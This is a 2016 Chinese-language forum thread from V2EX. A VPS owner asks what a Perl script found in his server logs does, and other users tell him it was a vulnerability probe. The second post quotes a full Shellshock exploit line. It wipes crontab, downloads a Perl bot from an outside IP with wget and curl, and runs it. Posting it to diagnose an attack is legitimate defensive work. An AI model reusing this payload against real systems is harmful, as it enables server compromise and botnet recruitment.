Home Sign Up Sign In
V2EX = way to explore
V2EX 是一个关于分享和探索的地方
Sign Up Now
For Existing Member  Sign In
通过以下 Referral 链接购买 DigitalOcean 主机,你将可以帮助 V2EX 持续发展
DigitalOcean - SSD Cloud Servers
badcode
V2EX  ›  VPS

vps 被扫,懂 perl 的 v 友有空可以进来看下是什么意思吗?

  •   
  •   badcode · May 2, 2016 · 722 views
    This topic created in 3656 days ago, the information mentioned may be changed or developed.
    http://31.184.194.100/batman-vs-superman
    日志里看到的,下载是 batman-vs-superman.pl
    看到几个关键字,代理, DCC , DoS...

    知道的朋友可以说下大概意思吗?
  • perl
  • VPS
  • 意思
  • dcc
    4 replies    2016-05-03 09:41:46 +08:00
    msg7086
        1
    msg7086  
       May 2, 2016   ❤️ 1
    简单说,就是可以到进局子里蹲着的事情。
    备份好数据赶紧重装就是啦。
    badcode
        2
    badcode  
    OP
       May 3, 2016
    @msg7086 别吓我呀
    下面是其中一条日志,上面的链接就是我直接粘贴复制找到的
    31.184.195.114 - - [30/Apr/2016:09:39:22 +0800] "GET /phppath/php4 HTTP/1.1" 403 162 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22crontab -r;killall -9 php perl; cd /tmp/ ; mkdir bat-mobile ; cd /tmp/bat-mobile ; wget http://31.184.194.100/batman-vs-superman ; perl batman-vs-superman ; lwp-download http://31.184.194.100/batman-vs-superman ; fetch http://31.184.194.100/batman-vs-superman ; curl -O http://31.184.194.100/batman-vs-superman ; perl batman-vs-superman;cd /tmp/;rm -rf bat*\x22);'"

    结合上面的脚本和日志
    能否说下我该怎么排查吗?

    非常感谢!!!
    msg7086
        3
    msg7086  
       May 3, 2016   ❤️ 1
    @badcode 这只是在试探漏洞而已。如果你打了补丁的话不会中招的。
    badcode
        4
    badcode  
    OP
       May 3, 2016 via iPhone
    好的,感谢回复
    About   ·   Help   ·   Advertise   ·   Blog   ·   API   ·   FAQ   ·   Solana   ·   2816 Online   Highest 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 46ms · UTC 15:39 · PVG 23:39 · LAX 08:39 · JFK 11:39
    ♥ Do have faith in what you're doing.